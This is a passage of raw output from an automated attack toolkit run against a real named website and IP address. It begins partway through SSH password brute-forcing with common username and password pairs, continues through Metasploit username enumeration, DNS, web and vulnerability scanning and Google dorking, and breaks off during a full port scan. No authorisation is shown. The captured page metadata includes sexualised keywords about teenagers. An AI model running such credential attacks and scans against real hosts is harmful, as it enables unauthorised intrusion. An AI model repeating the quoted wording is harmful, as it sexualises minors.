- NSE: [ssh-brute] Trying username/password pair: root:andrea
- NSE: [ssh-brute] Trying username/password pair: admin:andrea
- NSE: [ssh-brute] Trying username/password pair: administrator:andrea
- NSE: [ssh-brute] Trying username/password pair: webadmin:andrea
- NSE: [ssh-brute] Trying username/password pair: sysadmin:andrea
- NSE: [ssh-brute] Trying username/password pair: netadmin:andrea
- NSE: [ssh-brute] Trying username/password pair: guest:andrea
- NSE: [ssh-brute] Trying username/password pair: user:andrea
- NSE: [ssh-brute] Trying username/password pair: web:andrea
- NSE: [ssh-brute] Trying username/password pair: test:andrea
- NSE: [ssh-brute] Trying username/password pair: root:jennifer
- NSE: [ssh-brute] Trying username/password pair: admin:jennifer
- NSE: [ssh-brute] Trying username/password pair: administrator:jennifer
- NSE: [ssh-brute] Trying username/password pair: webadmin:jennifer
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jennifer
- NSE: [ssh-brute] Trying username/password pair: netadmin:jennifer
- NSE: [ssh-brute] Trying username/password pair: guest:jennifer
- NSE: [ssh-brute] Trying username/password pair: user:jennifer
- NSE: [ssh-brute] Trying username/password pair: web:jennifer
- NSE: [ssh-brute] Trying username/password pair: test:jennifer
- NSE: [ssh-brute] Trying username/password pair: root:joshua
- NSE: [ssh-brute] Trying username/password pair: admin:joshua
- NSE: [ssh-brute] Trying username/password pair: administrator:joshua
- NSE: [ssh-brute] Trying username/password pair: webadmin:joshua
- NSE: [ssh-brute] Trying username/password pair: sysadmin:joshua
- NSE: [ssh-brute] Trying username/password pair: netadmin:joshua
- NSE: [ssh-brute] Trying username/password pair: guest:joshua
- NSE: [ssh-brute] Trying username/password pair: user:joshua
- NSE: [ssh-brute] Trying username/password pair: web:joshua
- NSE: [ssh-brute] Trying username/password pair: test:joshua
- NSE: [ssh-brute] Trying username/password pair: root:carlos
- NSE: [ssh-brute] Trying username/password pair: admin:carlos
- NSE: [ssh-brute] Trying username/password pair: administrator:carlos
- NSE: [ssh-brute] Trying username/password pair: webadmin:carlos
- NSE: [ssh-brute] Trying username/password pair: sysadmin:carlos
- Nmap scan report for nn-stars.net (93.174.91.164)
- Host is up (0.12s latency).
- rDNS record for 93.174.91.164: no-reverse-dns-configured.com
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
- | ssh-auth-methods:
- | Supported authentication methods:
- | publickey
- |_ password
- | ssh-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 465 guesses in 181 seconds, average tps: 2.7
- | ssh-hostkey:
- | 1024 ab:16:56:89:21:7e:75:1c:77:f3:a2:7e:c2:f1:4c:09 (DSA)
- | 2048 22:f8:e3:f6:1a:1c:6a:99:09:6b:1e:7c:fd:30:e3:95 (RSA)
- |_ 256 a8:03:f4:96:36:d1:39:de:2e:4f:56:e9:0f:f3:63:56 (ECDSA)
- |_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
- |_ssh-run: Failed to specify credentials and command to run.
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 2.6.39 (95%), Linux 3.2.0 (95%), Linux 3.2 - 3.8 (94%), Linux 3.8 (94%), WatchGuard Fireware 11.8 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 3.1 - 3.2 (93%), Linux 3.5 (93%), Linux 2.6.32 - 2.6.39 (92%), Linux 3.0 - 3.2 (91%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 7 hops
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 109.36 ms 10.13.0.1
- 2 ...
- 3 109.39 ms po101.gra-g2-a75.fr.eu (178.33.103.231)
- 4 ...
- 5 116.10 ms be100-1112.ams-5-a9.nl.eu (213.251.128.67)
- 6 ...
- 7 115.39 ms no-reverse-dns-configured.com (93.174.91.164)
- [0m[0mUSER_FILE => /usr/share/brutex/wordlists/simple-users.txt
- [0mRHOSTS => nn-stars.net
- [0m[1m[33m[!][0m RHOST is not a valid option for this module. Did you mean RHOSTS?
- RHOST => nn-stars.net
- [0m[1m[34m[*][0m 93.174.91.164:22 - SSH - Checking for false positives
- [1m[34m[*][0m 93.174.91.164:22 - SSH - Starting scan
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'admin' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'administrator' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'anonymous' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'backup' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'bee' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'ftp' not found
- [1m[32m[+][0m 93.174.91.164:22 - SSH - User 'guest' found
- [1m[32m[+][0m 93.174.91.164:22 - SSH - User 'GUEST' found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'info' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'mail' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'mailadmin' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'msfadmin' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'mysql' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'nobody' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'oracle' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'owaspbwa' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'postfix' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'postgres' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'private' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'proftpd' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'public' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'root' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'superadmin' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'support' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'sys' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'system' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'systemadmin' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'systemadministrator' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'test' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'tomcat' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'user' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'webmaster' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'www-data' not found
- [1m[31m[-][0m 93.174.91.164:22 - SSH - User 'Fortimanager_Access' not found
- [1m[34m[*][0m Scanned 1 of 1 hosts (100% complete)
- [1m[34m[*][0m Auxiliary module execution completed
- [0m[0m[1m[31m[-][0m Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
- [0m[0m[1m[32m[+][0m 93.174.91.164:22 - SSH server version: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u6 ( service.version=6.0p1 openssh.comment=Debian-4+deb7u6 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Debian os.device=General os.family=Linux os.product=Linux os.version=7.0 service.protocol=ssh fingerprint_db=ssh.banner )
- [1m[34m[*][0m nn-stars.net:22 - Scanned 1 of 1 hosts (100% complete)
- [1m[34m[*][0m Auxiliary module execution completed
- [0m[91m + -- --=[Port 23 closed... skipping.[0m
- [91m + -- --=[Port 25 closed... skipping.[0m
- [93m + -- --=[Port 53 opened... running tests...[0m
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 02:16 EDT
- Nmap scan report for nn-stars.net (93.174.91.164)
- Host is up (0.024s latency).
- rDNS record for 93.174.91.164: no-reverse-dns-configured.com
- PORT STATE SERVICE VERSION
- 53/udp open domain ISC BIND (Fake version: 9.8.4-rpz2+rl005.12-P1)
- |_dns-cache-snoop: 0 of 100 tested domains are cached.
- |_dns-fuzz: The server seems impervious to our assault.
- | dns-nsec-enum:
- |_ No NSEC records found
- | dns-nsec3-enum:
- |_ DNSSEC NSEC3 not supported
- | dns-nsid:
- |_ bind.version: 9.8.4-rpz2+rl005.12-P1
- Too many fingerprints match this host to give specific OS details
- Network Distance: 7 hops
- Host script results:
- | dns-blacklist:
- | SPAM
- |_ l2.apews.org - SPAM
- | dns-brute:
- | DNS Brute-force hostnames:
- |_ www.nn-stars.net - 93.174.91.164
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 108.70 ms 10.13.0.1
- 2 ...
- 3 108.73 ms po101.gra-g2-a75.fr.eu (178.33.103.231)
- 4 111.35 ms 10.95.33.10
- 5 115.59 ms be100-1112.ams-5-a9.nl.eu (213.251.128.67)
- 6 ...
- 7 136.39 ms no-reverse-dns-configured.com (93.174.91.164)
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 616.20 seconds
- [91m + -- --=[Port 79 closed... skipping.[0m
- [93m + -- --=[Port 80 opened... running tests...[0m
- [92m + -- ----------------------------=[Checking for WAF]=------------------------ -- +[0m
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://nn-stars.net
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 13
- [92m + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +[0m
- [1m[34mhttp://nn-stars.net[0m [200 OK] [1m[37mCookies[0m[[37mfrom,idcheck,index_page,lfrom,vs[0m], [1m[37mCountry[0m[[37mNETHERLANDS[0m][[1m[31mNL[0m], [1m[37mHTTPServer[0m[[1m[36mnginx[0m], [1m[37mIP[0m[[37m93.174.91.164[0m], [1m[37mPHP[0m[[1m[32m5.4.45-0+deb7u8[0m], [1m[37mTitle[0m[[1m[33msexy teenspictures, teen angie[0m], [1m[37mX-Powered-By[0m[[37mPHP/5.4.45-0+deb7u8[0m], [1m[37mnginx[0m
- [94m __ ______ _____ [0m
- [94m \ \/ / ___|_ _|[0m
- [94m \ /\___ \ | | [0m
- [94m / \ ___) || | [0m
- [94m /_/\_|____/ |_| [0m
- [94m+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield[0m
- [94m+ -- --=[Target: nn-stars.net:80[0m
- [92m+ -- --=[Site not vulnerable to Cross-Site Tracing![0m
- [92m+ -- --=[Site not vulnerable to Host Header Injection![0m
- [91m+ -- --=[Site vulnerable to Cross-Frame Scripting![0m
- [91m+ -- --=[Site vulnerable to Clickjacking![0m
- [93mHTTP/1.1 405 Not Allowed
- Server: nginx
- Date: Fri, 27 Oct 2017 06:30:22 GMT
- Content-Type: text/html
- Content-Length: 166
- Connection: close
- <html>
- <head><title>405 Not Allowed</title></head>
- <body bgcolor="white">
- <center><h1>405 Not Allowed</h1></center>
- <hr><center>nginx</center>
- </body>
- </html>
- [0m
- [93mHTTP/1.1 200 OK
- Server: nginx
- Date: Fri, 27 Oct 2017 06:30:22 GMT
- Content-Type: text/html
- Transfer-Encoding: chunked
- Connection: keep-alive
- Vary: Accept-Encoding
- X-Powered-By: PHP/5.4.45-0+deb7u8
- Set-Cookie: from=spiders; expires=Sat, 28-Oct-2017 06:30:22 GMT; path=/
- Set-Cookie: lfrom=spiders; expires=Fri, 03-Nov-2017 06:30:22 GMT; path=/
- Set-Cookie: idcheck=1509085822; expires=Sat, 28-Oct-2017 06:30:22 GMT; path=/
- Set-Cookie: vs=spiders%7C; expires=Sat, 28-Oct-2017 06:30:22 GMT; path=/
- Set-Cookie: index_page=1; expires=Sat, 28-Oct-2017 06:30:22 GMT; path=/
- Vary: Accept-Encoding
- 1dcd
- <html>
- <head>
- <base target="_blank">
- <meta name="rating" content="general" />
- <link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />
- <link href="./css/home.css" rel="stylesheet" type="text/css" />
- <meta name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0" />
- <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
- <me[0m
- [92m + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +[0m
- [94m+ -- --=[Checking if X-Content options are enabled on nn-stars.net...[0m [93m
- [94m+ -- --=[Checking if X-Frame options are enabled on nn-stars.net...[0m [93m
- [94m+ -- --=[Checking if X-XSS-Protection header is enabled on nn-stars.net...[0m [93m
- [94m+ -- --=[Checking HTTP methods on nn-stars.net...[0m [93m
- [94m+ -- --=[Checking if TRACE method is enabled on nn-stars.net...[0m [93m
- [94m+ -- --=[Checking for META tags on nn-stars.net...[0m [93m
- <meta name="rating" content="general" />
- <meta name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0" />
- <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
- <meta name="description" content=" lovely teen movs, teen models shop, girls teens with, pictures make people, teen models from, models teenage nymphets, action sexy teen, girls tube sites, siteslovely teen movs, brunette latina teen" />
- <meta name="keywords" content=" young virgin, teen posing, movie small, couples pictures, newry teenager, teens hundreds, california teen" />
- <meta name="revisit-after" content="3 days" />
- <meta name="robots" content="index, follow" />
- <meta name="language" content="en" />
- [94m+ -- --=[Checking for open proxy on nn-stars.net...[0m [93m
- <html><body><h1>It works!</h1>
- <p>This is the default web page for this server.</p>
- <p>The web server software is running but no content has been added, yet.</p>
- </body></html>
- [94m+ -- --=[Enumerating software on nn-stars.net...[0m [93m
- Server: nginx
- X-Powered-By: PHP/5.4.45-0+deb7u8
- [94m+ -- --=[Checking if Strict-Transport-Security is enabled on nn-stars.net...[0m [93m
- [94m+ -- --=[Checking for Flash cross-domain policy on nn-stars.net...[0m [93m
- index.html
- [94m+ -- --=[Checking for Silverlight cross-domain policy on nn-stars.net...[0m [93m
- index.html
- [94m+ -- --=[Checking for HTML5 cross-origin resource sharing on nn-stars.net...[0m [93m
- [94m+ -- --=[Retrieving robots.txt on nn-stars.net...[0m [93m
- index.html
- [94m+ -- --=[Retrieving sitemap.xml on nn-stars.net...[0m [93m
- index.html
- [94m+ -- --=[Checking cookie attributes on nn-stars.net...[0m [93m
- Set-Cookie: index_page=1; expires=Sat, 28-Oct-2017 06:30:30 GMT; path=/
- [94m+ -- --=[Checking for ASP.NET Detailed Errors on nn-stars.net...[0m [93m
- [0m
- [92m + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +[0m
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 93.174.91.164
- + Target Hostname: nn-stars.net
- + Target Port: 80
- + Start Time: 2017-10-27 02:26:44 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: nginx
- + Cookie from created without the httponly flag
- + Cookie lfrom created without the httponly flag
- + Cookie idcheck created without the httponly flag
- + Cookie vs created without the httponly flag
- + Cookie index_page created without the httponly flag
- + Retrieved x-powered-by header: PHP/5.4.45-0+deb7u8
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + No CGI Directories found (use '-C all' to force check all possible dirs)
- + Server leaks inodes via ETags, header found with file /favicon.ico, fields: 0x52e0bbeb 0x200
- + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
- + Cookie PHPSESSID created without the httponly flag
- + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
- + OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
- + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
- + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
- + OSVDB-3233: /icons/README: Apache default file found.
- + 7446 requests: 0 error(s) and 17 item(s) reported on remote host
- + End Time: 2017-10-27 02:48:55 (GMT-4) (1331 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- [92m + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +[0m
- [91m[+][0m Screenshot saved to /usr/share/sniper/loot/screenshots/nn-stars.net-port80.jpg
- [92m + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +[0m
- [92m + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +[0m
- [1;36m _____ [1;37m .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. [0;31m.1BR'''Yp, .8BR'''Cq.
- [1;36m (_____)[1;37m 01 01N. C 01 C 01 .01. 01 [1;31m 01 Yb 01 .01.
- [1;36m (() ())[1;37m 01 C YCb C 01 C 01 ,C9 01 [0;31m 01 dP 01 ,C9
- [1;36m \ / [1;37m 01 C .CN. C 01 C 0101dC9 01 [1;31m 01'''bg. 0101dC9
- [1;36m \ / [1;37m 01 C .01.C 01 C 01 YC. 01 , [0;31m 01 .Y 01 YC.
- [1;36m /=\ [1;37m 01 C Y01 YC. ,C 01 .Cb. 01 ,C [1;31m 01 ,9 01 .Cb.
- [1;36m [___] [1;37m .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C [0;31m.J0101Cd9 .J01L. .J01./ [1;37m2.1
- [1;37m__[ ! ] Neither war between hackers, nor peace for the system.
- [1;37m__[ ! ] [02;31mhttp://blog.inurl.com.br
- [1;37m__[ ! ] [02;31mhttp://fb.com/InurlBrasil
- [1;37m__[ ! ] [02;31mhttp://twitter.com/@googleinurl[0m
- [1;37m__[ ! ] [02;31mhttp://github.com/googleinurl[0m
- [1;37m__[ ! ] [02;31mCurrent PHP version::[ [1;37m7.0.22-3 [02;31m][0m
- [1;37m__[ ! ] [02;31mCurrent script owner::[ [1;37mroot [02;31m][0m
- [1;37m__[ ! ] [02;31mCurrent uname::[ [1;37mLinux Kali 4.13.0-kali1-amd64 #1 SMP Debian 4.13.4-2kali1 (2017-10-16) x86_64 [02;31m][0m
- [1;37m__[ ! ] [02;31mCurrent pwd::[ [1;37m/usr/share/sniper [02;31m][0m
- [1;37m__[ ! ] [1;33mHelp: php inurlbr.php --help[0m
- [1;37m------------------------------------------------------------------------------------------------------------------------[0m
- [1;37m[ ! ] Starting SCANNER INURLBR 2.1 at [27-10-2017 02:51:02][0;37m
- [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
- It is the end user's responsibility to obey all applicable local, state and federal laws.
- Developers assume no liability and are not responsible for any misuse or damage caused by this program[0m
- [1;37m[ INFO ][02;31m[ OUTPUT FILE ]::[1;37m [ /usr/share/sniper/output/inurlbr-nn-stars.net.txt ][0m
- [1;37m[ INFO ][0m[02;31m[ DORK ]::[1;37m[ site:nn-stars.net ]
- [1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [1;37m{[0m
- [1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE - www.google.fr ][0m
- [1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
- [1;37m-[02;31m[[0;31m:::[02;31m][0m
- [1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE API ][0m
- [1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
- [1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m
- [1;37m[ INFO ][0m[02;31m[ ENGINE ]::[1;37m[ GOOGLE_GENERIC_RANDOM - www.google.com.gh ID: 002901626849897788481:cpnctza84gq ][0m
- [1;37m[ INFO ][0m[02;31m[ SEARCHING ]:: [0m
- [1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m[1;37m-[02;31m[[0;31m:::[02;31m][0m
- [1;37m[ INFO ][0;31m[ TOTAL FOUND VALUES ]::[1;37m [ 0 ][0m
- [1;37m[ INFO ][1;33m Not a satisfactory result was found![0m
- [1;37m[ INFO ] [ Shutting down ][0m
- [1;37m[ INFO ] [ End of process INURLBR at [27-10-2017 02:51:12][0m
- [1;37m[ INFO ] [0m[02;31m[ TOTAL FILTERED VALUES ]::[1;37m [ 0 ][0m
- [1;37m[ INFO ] [02;31m[ OUTPUT FILE ]::[1;37m [ /usr/share/sniper/output/inurlbr-nn-stars.net.txt ][0m
- [1;37m|_________________________________________________________________________________________[0m
- [1;37m\_________________________________________________________________________________________/[0m
- [91m + -- --=[Port 110 closed... skipping.[0m
- [93m + -- --=[Port 111 opened... running tests...[0m
- [91m + -- --=[Port 135 closed... skipping.[0m
- [91m + -- --=[Port 139 closed... skipping.[0m
- [91m + -- --=[Port 161 closed... skipping.[0m
- [91m + -- --=[Port 162 closed... skipping.[0m
- [91m + -- --=[Port 389 closed... skipping.[0m
- [91m + -- --=[Port 443 closed... skipping.[0m
- [91m + -- --=[Port 445 closed... skipping.[0m
- [91m + -- --=[Port 512 closed... skipping.[0m
- [91m + -- --=[Port 513 closed... skipping.[0m
- [91m + -- --=[Port 514 closed... skipping.[0m
- [91m + -- --=[Port 623 closed... skipping.[0m
- [91m + -- --=[Port 624 closed... skipping.[0m
- [91m + -- --=[Port 1099 closed... skipping.[0m
- [91m + -- --=[Port 1433 closed... skipping.[0m
- [91m + -- --=[Port 2049 closed... skipping.[0m
- [91m + -- --=[Port 2121 closed... skipping.[0m
- [91m + -- --=[Port 3306 closed... skipping.[0m
- [91m + -- --=[Port 3310 closed... skipping.[0m
- [91m + -- --=[Port 3128 closed... skipping.[0m
- [91m + -- --=[Port 3389 closed... skipping.[0m
- [91m + -- --=[Port 3632 closed... skipping.[0m
- [91m + -- --=[Port 4443 closed... skipping.[0m
- [91m + -- --=[Port 5432 closed... skipping.[0m
- [91m + -- --=[Port 5800 closed... skipping.[0m
- [91m + -- --=[Port 5900 closed... skipping.[0m
- [91m + -- --=[Port 5984 closed... skipping.[0m
- [91m + -- --=[Port 6000 closed... skipping.[0m
- [91m + -- --=[Port 6667 closed... skipping.[0m
- [91m + -- --=[Port 8000 closed... skipping.[0m
- [91m + -- --=[Port 8100 closed... skipping.[0m
- [91m + -- --=[Port 8080 closed... skipping.[0m
- [91m + -- --=[Port 8180 closed... skipping.[0m
- [91m + -- --=[Port 8443 closed... skipping.[0m
- [91m + -- --=[Port 8888 closed... skipping.[0m
- [91m + -- --=[Port 10000 closed... skipping.[0m
- [91m + -- --=[Port 16992 closed... skipping.[0m
- [91m + -- --=[Port 27017 closed... skipping.[0m
- [91m + -- --=[Port 27018 closed... skipping.[0m
- [91m + -- --=[Port 27019 closed... skipping.[0m
- [91m + -- --=[Port 28017 closed... skipping.[0m
- [91m + -- --=[Port 49152 closed... skipping.[0m
- [92m + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +[0m
- #########################################################################################
- oooooo oooo .o. .oooooo..o ooooo ooo .oooooo.
- `888. .8' .888. d8P' `Y8 `888' `8' d8P' `Y8b
- `888. .8' .88888. Y88bo. 888 8 888 888
- `888.8' .8' `888. `ZY8888o. 888 8 888 888
- `888' .88ooo8888. `0Y88b 888 8 888 888
- 888 .8' `888. oo .d8P `88. .8' `88b d88'
- o888o o88o o8888o 88888888P' `YbodP' `Y8bood8P'
- Welcome to Yasuo v2.3
- Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
- #########################################################################################
- I, [2017-10-27T02:51:15.351610 #23874] INFO -- : Initiating port scan
- I, [2017-10-27T02:51:18.650912 #23874] INFO -- : Using nmap scan output file logs/nmap_output_2017-10-27_02-51-15.xml
- [92m + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +[0m
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 02:51 EDT
- NSE: Loaded 42 scripts for scanning.
- Initiating Parallel DNS resolution of 1 host. at 02:51
- Completed Parallel DNS resolution of 1 host. at 02:51, 0.06s elapsed
- Initiating SYN Stealth Scan at 02:51
- Scanning nn-stars.net (93.174.91.164) [65355 ports]
- Increasing send delay for 93.174.91.164 from 0 to 5 due to 11 out of 25 dropped probes since last increase.
- Discovered open port 80/tcp on 93.174.91.164
- Discovered open port 22/tcp on 93.174.91.164
- Discovered open port 53/tcp on 93.174.91.164
- Discovered open port 111/tcp on 93.174.91.164
- Discovered open port 21/tcp on 93.174.91.164
- Increasing send delay for 93.174.91.164 from 5 to 10 due to 97 out of 242 dropped probes since last increase.
- SYN Stealth Scan Timing: About 0.47% done
- Warning: 93.174.91.164 giving up on port because retransmission cap hit (6).
- SYN Stealth Scan Timing: About 0.72% done
- SYN Stealth Scan Timing: About 1.05% done; ETC: 05:16 (2:23:28 remaining)
- SYN Stealth Scan Timing: About 1.28% done; ETC: 05:28 (2:35:14 remaining)
- SYN Stealth Scan Timing: About 1.57% done; ETC: 05:37 (2:43:44 remaining)
- SYN Stealth Scan Timing: About 2.06% done; ETC: 05:29 (2:35:16 remaining)
- SYN Stealth Scan Timing: About 2.87% done; ETC: 05:02 (2:07:25 remaining)
- SYN Stealth Scan Timing: About 3.52% done; ETC: 04:52 (1:56:52 remaining)
- SYN Stealth Scan Timing: About 4.23% done; ETC: 04:46 (1:50:13 remaining)
- SYN Stealth Scan Timing: About 6.86% done; ETC: 04:43 (1:44:02 remaining)
- SYN Stealth Scan Timing: About 8.53% done; ETC: 04:38 (1:37:49 remaining)
- SYN Stealth Scan Timing: About 10.94% done; ETC: 04:34 (1:32:10 remaining)
- SYN Stealth Scan Timing: About 13.59% done; ETC: 04:31 (1:26:55 remaining)
- SYN Stealth Scan Timing: About 15.24% done; ETC: 04:27 (1:21:36 remaining)
- SYN Stealth Scan Timing: About 17.27% done; ETC: 04:24 (1:16:43 remaining)
- SYN Stealth Scan Timing: About 19.63% done; ETC: 04:20 (1:11:55 remaining)
- SYN Stealth Scan Timing: About 22.27% done; ETC: 04:18 (1:07:26 remaining)
- SYN Stealth Scan Timing: About 24.73% done; ETC: 04:15 (1:03:04 remaining)
- SYN Stealth Scan Timing: About 28.34% done; ETC: 04:13 (0:58:51 remaining)
- SYN Stealth Scan Timing: About 31.04% done; ETC: 04:10 (0:54:41 remaining)
- SYN Stealth Scan Timing: About 34.05% done; ETC: 04:08 (0:50:40 remaining)
- SYN Stealth Scan Timing: About 37.29% done; ETC: 04:05 (0:46:47 remaining)
- SYN Stealth Scan Timing: About 40.80% done; ETC: 04:03 (0:42:59 remaining)
- SYN Stealth Scan Timing: About 44.21% done; ETC: 04:01 (0:39:19 remaining)
- SYN Stealth Scan Timing: About 48.20% done; ETC: 04:00 (0:35:45 remaining)
- SYN Stealth Scan Timing: About 53.59% done; ETC: 04:00 (0:32:16 remaining)
- SYN Stealth Scan Timing: About 59.00% done; ETC: 04:01 (0:28:47 remaining)
- SYN Stealth Scan Timing: About 64.19% done; ETC: 04:01 (0:25:12 remaining)
- SYN Stealth Scan Timing: About 69.49% done; ETC: 04:02 (0:21:38 remaining)
- SYN Stealth Scan Timing: About 74.24% done; ETC: 04:01 (0:18:00 remaining)
- SYN Stealth Scan Timing: About 78.89% done; ETC: 03:59 (0:14:27 remaining)
- SYN Stealth Scan Timing: About 83.73% done; ETC: 03:58 (0:10:57 remaining)
- SYN Stealth Scan Timing: About 88.74% done; ETC: 03:58 (0:07:33 remaining)
- Discovered open port 44601/tcp on 93.174.91.164
- SYN Stealth Scan Timing: About 93.73% done; ETC: 03:57 (0:04:09 remaining)
- SYN Stealth Scan Timing: About 98.72% done; ETC: 03:56 (0:00:50 remaining)
- Discovered open port 538/tcp on 93.174.91.164
- Completed SYN Stealth Scan at 04:21, 5403.00s elapsed (65355 total ports)
- Initiating Service scan at 04:21
- Scanning 7 services on nn-stars.net (93.174.91.164)
- Completed Service scan at 04:23, 155.39s elapsed (7 services on 1 host)
- Initiating OS detection (try #1) against nn-stars.net (93.174.91.164)
- Retrying OS detection (try #2) against nn-stars.net (93.174.91.164)
- NSE: Script scanning 93.174.91.164.
- Initiating NSE at 04:24
- Completed NSE at 04:24, 0.56s elapsed
- Initiating NSE at 04:24
- Completed NSE at 04:24, 1.95s elapsed
- Nmap scan report for nn-stars.net (93.174.91.164)
- Host is up (0.12s latency).
- rDNS record for 93.174.91.164: no-reverse-dns-configured.com
- Not shown: 65164 closed ports, 184 filtered ports
- PORT STATE SERVICE VERSION
- 21/tcp open ftp vsftpd 3.0.2
